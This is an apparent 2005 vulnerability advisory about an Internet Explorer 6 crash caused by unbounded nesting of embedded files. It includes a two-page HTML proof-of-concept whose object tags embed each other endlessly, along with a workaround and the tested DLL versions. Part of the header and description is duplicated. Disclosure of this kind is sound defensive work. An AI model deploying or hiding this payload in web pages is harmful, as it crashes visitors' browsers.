Microsoft Internet Explorer - Crash on processing embedded files with
endless loop (05/28/2005)
Description:
There is a bug in Microsoft Internet Explorer, which causes a crash in it.
The bug occurs, because Microsoft Internet Explorer doesn't limit the depth
of embedded files.
Affected software:
Microsoft Internet Explorer
Workaround:
Deactivate "ActiveX" in the IE options menu.
endless loop (05/28/2005)
Description:
There is a bug in Microsoft Internet Explorer, which causes a crash in it.
The bug occurs, because Microsoft Internet Explorer doesn't limit the depth
of embedded files.
Affected software:
Microsoft Internet Explorer
Workaround:
Deactivate "ActiveX" in the IE options menu.
Proof-of-Concept exploit:
Page #1 (save as "btf1.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>
Page #2 (save as "btf2.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>
Date of discovery:
26. September 2003
Tested software:
Microsoft Internet Explorer 6 SP2 (6.0.2900.2180.xpsp_sp2_gdr.050301-1519)
on a fully patched Windows XP SP2 system.
DLL versions:
MSHTML.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
BROWSEUI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHDOCVW.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHLWAPI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
URLMON.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
WININET.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
Regards,
Benjamin Tobias Franz
Germany
[ reply ]